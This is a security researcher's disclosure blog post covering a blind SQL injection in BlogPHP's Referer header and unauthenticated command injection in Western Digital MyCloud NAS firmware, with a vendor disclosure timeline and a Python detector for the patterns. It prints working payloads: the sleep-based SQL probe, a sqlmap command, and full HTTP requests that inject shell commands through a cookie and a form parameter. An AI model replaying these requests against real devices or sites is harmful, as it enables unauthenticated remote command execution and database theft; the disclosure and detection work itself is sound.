My first CVE-2016-1000329 in BlogPHP

While the affected software, BlogPHP isn’t in widespread use (at least I hope not!) and it’s outdated and abandoned by the developer, this find means a lot to me because it’s my first CVE. This vulnerability has also been overlooked by many people for years, including those that worked on the Breach 2.1 vulnhub challenge. Breach 2.1 is a boot2root/CTF challenge which attempts to showcase a real-world scenario penetration test. My full write-up of my pentest of Breach can be found here.

I used an XSS exploit to steal the admin’s cookie, which should have allowed me to log in as admin, but it didn’t work. Knowing that the admin user was logging in to a blog hosted on the same host, I decided to take a look at the HTTP headers to see if I needed to change something in the “Referer” field in order for the stolen cookie to allow me to log in as admin. I initially tried changing it to localhost and 127.0.0.1 with no success.

While fuzzing the HTTP header “Referer” field I discovered a blind SQL injection. Using an input of ‘+(select*from(select(sleep(20)))a)+’, including the single quotes, results in a 20 second delay before the page renders. I was able to further exploit the vulnerability using sqlmap. I saved the request from Burp Suite to a text file and exploited it with sqlmap using “sqlmap -r req.txt --level=5 --risk=3”.

I submitted my CVE request through Mitre, who notified me that “The Distributed Weakness Filing (DWF) Project is the CVE Numbering Authority (CNA) currently responsible for assigning CVE IDs to open source software vulnerabilities that are outside of the current CVE coverage goals listed at http://cve.mitre.org/cve/data_sources_product_coverage.html.”

CVE listing for CVE-2016-1000329 on DWF.

Command Injection vulnerability in Western Digital MyCloud NAS

The software version of my device is 2.11.142 and my device says that it’s up to date.

The first command injection vulnerability is in the Cookie header sent to the home page URL, “/” (index.php): the username cookie value is passed to a shell command. To detect successful exploitation I started Wireshark and watched for the pings sent to my IP address from the device.

The request:

GET / HTTP/1.1
Host: wdmycloudex2
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 192.168.1.153`; local_login=1

I deleted the PHPSESSID from the cookie and it still worked without any authentication.

The next one was in the /web/google_analytics.php URL.

POST /web/google_analytics.php HTTP/1.1
Host: wdmycloudex2
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://wdmycloudex2/
Content-Length: 52
Cookie: isAdmin=1; username=admin; username=admin; local_login=1; fw_version=2.11.142
Connection: close
cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23

I was also able to exploit this one unauthenticated on the LAN by deleting the PHPSESSID from the cookie and replaying the request from a different computer.
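As an added example (not code from the original post or from either vendor), here is a small Python checker that parses raw HTTP requests like the ones above and flags the two indicator types from both findings: shell metacharacters in a cookie value, and a time-based SQL probe in the Referer header. The sample requests are constructed to mirror the requests shown on this page; the hostnames and the regex heuristics are my own choices.

```python
import re
from urllib.parse import unquote

# Heuristics for the two injection classes in this post: shell metacharacters
# in a cookie value (MyCloud) and a time-based SQL probe in Referer (BlogPHP).
SHELL_META = re.compile(r"[|;&`]|\$\(")
SQL_TIME = re.compile(r"\b(sleep|benchmark)\s*\(|waitfor\s+delay", re.IGNORECASE)

def parse_headers(raw: str) -> dict[str, list[str]]:
    """Map lowercase header name -> list of values from a raw request."""
    headers: dict[str, list[str]] = {}
    for line in raw.strip().splitlines()[1:]:   # skip the request line
        if not line.strip():
            break                                # blank line ends the headers
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers

def cookie_pairs(cookie_header: str) -> list[tuple[str, str]]:
    """Split 'a=1; b=2' into (name, value) pairs, keeping duplicate names."""
    pairs = []
    for part in cookie_header.split(";"):
        name, _, value = part.partition("=")
        if name.strip():
            pairs.append((name.strip(), unquote(value.strip())))
    return pairs

def find_indicators(raw: str) -> list[str]:
    """Return a label for every header value matching an injection heuristic."""
    hits = []
    h = parse_headers(raw)
    for cookie in h.get("cookie", []):
        for name, value in cookie_pairs(cookie):
            if SHELL_META.search(value):
                hits.append(f"cookie:{name}")
    for ref in h.get("referer", []):
        if SQL_TIME.search(unquote(ref)):
            hits.append("referer")
    return hits

# Constructed samples modelled on the requests shown in this post.
MYCLOUD_REQ = "GET / HTTP/1.1\r\nHost: wdmycloudex2\r\nCookie: isAdmin=1; username=admin|echo%20`ping -c 3 192.168.1.153`; local_login=1\r\n\r\n"
BLOGPHP_REQ = "GET /blog/index.php HTTP/1.1\r\nHost: example.test\r\nReferer: http://example.test/'+(select*from(select(sleep(20)))a)+'\r\n\r\n"
BENIGN_REQ = "GET / HTTP/1.1\r\nHost: example.test\r\nCookie: PHPSESSID=abc123; theme=dark\r\nReferer: http://example.test/\r\n\r\n"

if __name__ == "__main__":
    for label, req in [("mycloud", MYCLOUD_REQ), ("blogphp", BLOGPHP_REQ), ("benign", BENIGN_REQ)]:
        print(label, find_indicators(req))
```

The same functions can be pointed at a proxy log or a pcap export of request headers; expect some false positives from legitimate values containing `&` or `$`, so treat a hit as a triage lead rather than a verdict.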

I submitted the vulnerabilities to Western Digital on 10/8/2016 and on 12/13/2016 received word that they had released a firmware update to remediate them. These vulnerabilities have been submitted to Mitre for CVE assignment.

Update 1/3/2017: Mitre assigned CVEs CVE-2016-10107 and CVE-2016-10108.

Update 1/10/2017: I received two new emails from Western Digital after the one they sent on 12/13/2016 telling me they had released a firmware patch. They only patched CVE-2016-10108.

On 12/29/2016:

On 1/9/2017: